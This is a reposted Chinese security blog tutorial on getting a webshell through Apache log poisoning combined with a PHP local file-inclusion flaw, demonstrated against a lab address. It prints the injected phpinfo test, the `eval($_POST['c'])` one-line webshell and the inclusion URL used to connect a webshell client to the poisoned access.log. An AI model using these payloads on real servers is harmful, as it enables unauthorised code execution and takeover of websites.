技术笔记

PHP文件包含之通过apache日志拿webshll

字号+ 作者:sn0w 来源:转载 2016-11-27 16:00 我要评论( )

apache会通过日志文件记录用户的连接信息,这些信息包括ip地址、访问时间、请求类型、状态码等信息,这样我们通过访问指定的url将一句话写入到日志文件中,然后通......

apache会通过日志文件记录用户的连接信息,这些信息包括ip地址、访问时间、请求类型、状态码等信息,这样我们通过访问指定的url将一句话写入到日志文件中,然后通过解析漏洞访问日志文件。
 
首先我们访问

http://10.167.99.1/<?php phpinfo()?>

找到日志文件(apache下的logs文件夹)
PHP文件包含之通过apache日志拿webshll - sn0w - 雪花 -  root@sn0w.top
 我们发现<>已经被URL编码,编码后的php语句已经不能被解析,下面我们说一下如何绕过URL的编码。
首先我们通过burpsuite设置好本地代理,做好抓包准备。
我们重新写入我们的一句话(蓝色部分)
PHP文件包含之通过apache日志拿webshll - sn0w - 雪花 -  root@sn0w.top
 发送后我们再看一下log文件
PHP文件包含之通过apache日志拿webshll - sn0w - 雪花 -  root@sn0w.top
 然后我们通过包含漏洞访问log文件 phpinfo()已经解析
PHP文件包含之通过apache日志拿webshll - sn0w - 雪花 -  root@sn0w.top
 
 如果我们将phpinfo() 换成 <?php eval($_POST['c'])?> 即可把日志文件变成一句话木马。

通过菜刀连接:http://10.167.99.1/111332.php?url=D:\phpStudy\Apache\logs\access.log

PHP文件包含之通过apache日志拿webshll - sn0w - 雪花 -  root@sn0w.top
成功!

本文来自: 蜗蜗侠's Blog-关注网络安全 http://blog.icxun.cn/Note/342.html

1.本站遵循行业规范,任何转载的稿件都会明确标注作者和来源;2.本站的原创文章,请转载时务必注明文章作者和来源,不尊重原创的行为我们将追究责任;3.作者投稿可能会经我们编辑修改或补充。

相关文章
  • 新思路php一句话过waf

    新思路php一句话过waf

    2018-03-22 09:10

  • 用DiskGenius读取虚拟机磁盘文件

    用DiskGenius读取虚拟机磁盘文件

    2017-03-15 09:32

  • 关于Safe DOG的文件上传bypass

    关于Safe DOG的文件上传bypass

    2017-03-07 09:08

  • python和django的目录遍历漏洞(任意文件读取)

    python和django的目录遍历漏洞(任意文件读取)

    2016-12-18 14:19

网友点评
暂时未开启评论功能~